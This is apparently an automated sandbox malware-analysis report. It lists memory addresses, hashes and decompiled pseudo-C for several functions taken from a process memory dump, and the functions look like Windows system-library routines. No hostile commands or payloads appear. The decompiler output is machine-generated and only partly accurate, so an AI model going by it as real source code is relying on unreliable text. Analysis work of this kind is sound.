0x018ce806
0x00000000
0x018ce7c9
0x018ce7d1
0x018ce7d8
0x00000000
0x018ce7d8
0x00000000
0x00000000
0x018ce722
0x018ce72e
0x018ce748
0x018ce74c
0x018ce754
0x018ce756
0x018ce75c
0x018ce75c
0x00000000
0x018ce75c
0x018ce758
0x018ce758
0x00000000
0x018ce758
0x018ce750
0x00000000
0x00000000
0x018ce752
0x00000000
0x018ce752
0x018ce730
0x018ce735
0x018ce73d
0x018ce73f
0x00000000
0x00000000
0x018ce741
0x018ce741
0x00000000
0x018ce741
0x018ce739
0x00000000
0x00000000
0x018ce73b
0x00000000
0x018ce73b
0x018ce722
0x018ce720
0x018ce6b0
0x018ce618
0x00000000
0x018ce618

Strings

`, xrefs: 018CE5D7
`, xrefs: 018CE670

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: fd41d4013ef46bf744b1349bb437265d6ad7bebd272ea8252ec767f3b0265b14
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: B4918E726043469FE724CE69C941B1BBFE5EF84B14F14892DF699CB280E774EA04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 018851BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E018851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18e05f0);
				E0185D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0181EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E018853CA(0);
						return E0185D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0184F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01823690(1, _t117, 0x17e1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0184AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01824620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0184AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0188500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01849860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x018851be
0x018851c3
0x018851c8
0x018851cd
0x018851d0
0x018851d3
0x018851d8
0x018851db
0x018851de
0x018851e0
0x018851e3
0x018851e6
0x018851e8
0x01885342
0x01885351
0x01885356
0x0188535a
0x01885360
0x01885363
0x01885366
0x01885369
0x01885369
0x0188536b
0x0188536b
0x01885370
0x018853a3
0x018853a4
0x018853a6
0x018853ab
0x018853ab
0x018853ae
0x018853ae
0x018853b5
0x018853bf
0x018853bf
0x01885375
0x01885396
0x018853a0
0x018853a0
0x00000000
0x01885396
0x01885377
0x01885379
0x0188537f
0x0188538c
0x01885390
0x00000000
0x01885390
0x018851ee
0x018851f1
0x01885301
0x01885310
0x01885315
0x01885318
0x0188531b
0x01885320
0x0188532e
0x01885331
0x00000000
0x01885331
0x01885328
0x01885329
0x00000000
0x01885329
0x018851fa
0x01885235
0x01885236
0x01885239
0x0188523f
0x01885240
0x01885241
0x01885242
0x01885246
0x01885247
0x0188524e
0x01885251
0x01885267
0x01885269
0x0188526e
0x0188527d
0x0188527e
0x01885281
0x01885282
0x01885287
0x01885288
0x0188528a
0x0188528f
0x01885294
0x00000000
0x00000000
0x0188529a
0x0188529c
0x0188529e
0x0188529e
0x018852a4
0x018852b0
0x00000000
0x00000000
0x018852ba
0x018852bc
0x018852bc
0x018852d4
0x018852d9
0x018852dc
0x018852e1
0x00000000
0x00000000
0x018852e7
0x018852f4
0x00000000
0x018852f4
0x01885270
0x00000000
0x01885270
0x018851fc
0x018851fd
0x01885202
0x01885203
0x01885205
0x0188520a
0x0188520f
0x00000000
0x00000000
0x0188521b
0x01885226
0x0188522b
0x0188521d
0x0188521d
0x01885222
0x01885222
0x0188522d
0x00000000

Strings

Legacy, xrefs: 01885226
UEFI, xrefs: 0188521D

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 4efa3aba1cee6ccdfcf552b434e6b0d3e02e580e1e844adcf10cae3c8c80589a
Instruction ID: c562aac0ea3f113a900519c04d707e5da9947d21408a71329ff0127168e7e59c
Opcode Fuzzy Hash: 4efa3aba1cee6ccdfcf552b434e6b0d3e02e580e1e844adcf10cae3c8c80589a
Instruction Fuzzy Hash: 8B517FB1E406099FDB25EFA8C950BAEBBF8FF49704F14402DE649EB251DB719A40CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0182B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0182B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x18fd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01827D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E018D8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01849E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0184B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0184CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01827D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E018D8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0184AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x18f8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x18f862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x18f8628; // 0x0
							_t116 =  *0x18f862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0182b94c
0x0182b956
0x0182b95c
0x0182b95e
0x0182b964
0x0182b969
0x0182b96d
0x0182b96d
0x0182b970
0x0182b974
0x0182b97a
0x0182badf
0x0182badf
0x0182bae2
0x0182bae4
0x0182bae6
0x0182baf0
0x01872cb8
0x0182baf6
0x0182baf6
0x0182baf6
0x0182bafd
0x0182bb1f
0x0182bb1f
0x0182baff
0x0182bb00
0x0182bb00
0x0182bb03
0x0182bb03
0x0182bacb
0x0182bacf
0x0182bad0
0x0182bad1
0x0182badc
0x0182badc
0x0182b980
0x0182b980
0x0182b988
0x0182b98b
0x0182b98d
0x0182b990
0x0182b993
0x0182b999
0x0182b99b
0x0182b9a1
0x0182b9a5
0x0182b9aa
0x0182b9b0
0x0182b9bb
0x0182b9c0
0x0182b9c3
0x0182b9ca
0x0182b9cc
0x0182b9cf
0x0182b9d3
0x0182b9d7
0x0182ba94
0x0182ba94
0x0182ba98
0x0182baa3
0x01872ccb
0x0182baa9
0x0182baa9
0x0182baa9
0x0182bab1
0x01872cd5
0x01872cdd
0x01872cdd
0x0182babb
0x0182babc
0x0182bac2
0x0182bac3
0x0182bac3
0x0182bac6
0x00000000
0x0182b9dd
0x0182b9dd
0x0182b9e7
0x0182b9e7
0x0182b9ec
0x0182b9ec
0x0182b9f1
0x0182b9f5
0x0182b9fa
0x0182ba00
0x0182ba0c
0x0182ba10
0x0182ba10
0x0182ba12
0x0182ba18
0x00000000
0x00000000
0x0182bb26
0x0182bb26
0x0182ba1e
0x0182ba1e
0x0182ba23
0x0182ba25
0x0182ba2c
0x0182ba30
0x0182ba35
0x0182ba35
0x0182ba41
0x0182ba46
0x0182ba4c
0x0182ba50
0x0182ba54
0x0182ba6a
0x0182ba6e
0x0182ba70
0x0182ba74
0x0182ba78
0x0182ba7a
0x0182ba7c
0x0182ba8e
0x0182ba90
0x0182ba92
0x0182bb14
0x0182bb14
0x0182bb16
0x0182bb16
0x00000000
0x0182ba7c
0x0182bb0a
0x0182bb0d
0x00000000
0x00000000
0x00000000
0x0182bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0182B9A5

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 7daf81e1f8270147904f3e1e6284e234825db4b6aba4fe8424756971b4715cd4
Instruction ID: de85d922004a95a37b0a5a7ee87ad4c599a958a6cf49fbf61e3f4ce794efb263
Opcode Fuzzy Hash: 7daf81e1f8270147904f3e1e6284e234825db4b6aba4fe8424756971b4715cd4
Instruction Fuzzy Hash: C0516B7160A355CFC722CF2DC08092ABBE5FB88714F54496EEA86C7345D731EA80CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0180B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0180B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x18df7a8);
				E0185D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0185D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0184D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0184F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0185DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0184B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0184B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0184E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0184A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0180b171
0x0180b171
0x0180b171
0x0180b171
0x0180b171
0x0180b176
0x0180b17b
0x0180b180
0x0180b186
0x0180b18f
0x0180b198
0x0180b1a4
0x0180b1aa
0x01864802
0x01864802
0x01864805
0x0186480c
0x0186480e
0x0180b1d1
0x0180b1d3
0x0180b1de
0x0180b1de
0x01864817
0x0186481e
0x01864820
0x01864822
0x01864822
0x01864824
0x01864824
0x0186482a
0x00000000
0x00000000
0x01864835
0x0186483a
0x0186483d
0x0186483f
0x01864842
0x01864842
0x01864842
0x01864846
0x0186484c
0x0186484e
0x01864851
0x01864851
0x01864853
0x01864854
0x01864854
0x01864858
0x0186485a
0x0186485a
0x0186485d
0x0186485f
0x01864861
0x01864861
0x01864866
0x0186486b
0x0186486e
0x01864871
0x01864876
0x01864876
0x01864878
0x0186487b
0x01864884
0x01864884
0x00000000
0x0186487d
0x0186487d
0x01864882
0x01864889
0x01864889
0x0186488f
0x01864891
0x018648e0
0x018648e2
0x018648e4
0x018648e4
0x018648e7
0x018648e7
0x018648ed
0x018648f4
0x018648f6
0x01864951
0x01864951
0x01864953
0x01864953
0x01864956
0x01864956
0x01864958
0x01864959
0x01864959
0x0186495d
0x0186495d
0x0186495f
0x0186495f
0x01864965
0x01864969
0x018649ba
0x018649ba
0x018649c1
0x018649c5
0x018649cc
0x018649d4
0x018649d7
0x018649da
0x018649e4
0x018649e5
0x018649f3
0x01864a02
0x00000000
0x01864a02
0x01864972
0x01864974
0x00000000
0x00000000
0x01864976
0x01864979
0x01864982
0x01864983
0x01864984
0x0186498b
0x0186498d
0x01864991
0x01864993
0x01864999
0x0186499d
0x018649a2
0x018649a2
0x018649a2
0x01864999
0x018649ac
0x00000000
0x018649b3
0x018648f8
0x018648fe
0x00000000
0x00000000
0x00000000
0x018648fe
0x01864895
0x0186489c
0x018648ad
0x018648b2
0x018648b5
0x018648b7
0x018648ba
0x018648bc
0x018648c6
0x018648c6
0x018648cb
0x018648d1
0x018648d4
0x018648d8
0x018648d8
0x00000000
0x018648d8
0x018648be
0x018648c0
0x00000000
0x00000000
0x018648c2
0x00000000
0x00000000
0x00000000
0x018648c4
0x00000000
0x01864882
0x0186487b
0x01864904
0x01864906
0x00000000
0x00000000
0x01864908
0x0186490e
0x00000000
0x00000000
0x01864910
0x01864917
0x01864917
0x00000000
0x01864917
0x0180b1ba
0x018647f9
0x018647fc
0x00000000
0x00000000
0x00000000
0x018647fc
0x0180b1c0
0x0180b1c0
0x0180b1c3
0x0180b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 018648AD

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: b0f4b8f0c5fa9501a525071c36cc2e6a356af6117d978ab945e937f629cfa547
Instruction ID: 8d17479453b4c9a79fbb8a4252625c627460a43164433325c419e85fb847d869
Opcode Fuzzy Hash: b0f4b8f0c5fa9501a525071c36cc2e6a356af6117d978ab945e937f629cfa547
Instruction Fuzzy Hash: C651EF71D0025A8FEB36CF68C844BAEBBB5FF00714F1042ADD859EB292D7744A81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01832581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E01832581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t241;
				signed int _t245;
				signed int _t247;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				signed int _t284;
				signed int _t286;
				void* _t288;
				void* _t289;
				signed int _t290;
				unsigned int _t293;
				signed int _t297;
				signed int* _t298;
				signed int _t299;
				signed int _t303;
				intOrPtr _t315;
				signed int _t324;
				signed int _t326;
				signed int _t327;
				signed int _t331;
				signed int _t332;
				void* _t334;
				signed int _t335;
				signed int _t337;
				signed int _t339;
				signed int _t340;
				void* _t343;

				_t337 = _t339;
				_t340 = _t339 - 0x4c;
				_v8 =  *0x18fd360 ^ _t337;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t331 = 0x18fb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t293 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t284 = 0x48;
				_t313 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t324 = 0;
				_v37 = _t313;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t332 = 0xc0000106;
						goto L32;
					} else {
						_t331 = L01824620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t331;
						__eflags = _t331;
						if(_t331 == 0) {
							_t332 = 0xc0000017;
							goto L32;
						} else {
							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
							_t50 = _t331 + 0x48; // 0x48
							_t326 = _t50;
							_t313 = _v32;
							 *(_t331 + 0x3c) = _t284;
							_t286 = 0;
							 *((short*)(_t331 + 0x30)) = _v48;
							__eflags = _t313;
							if(_t313 != 0) {
								 *(_t331 + 0x18) = _t326;
								__eflags = _t313 - 0x18f8478;
								 *_t331 = ((0 | _t313 == 0x018f8478) - 0x00000001 & 0xfffffffb) + 7;
								E0184F3E0(_t326,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
								_t313 = _v32;
								_t340 = _t340 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t326 = _t326 + (( *_t313 & 0x0000ffff) >> 1) * 2;
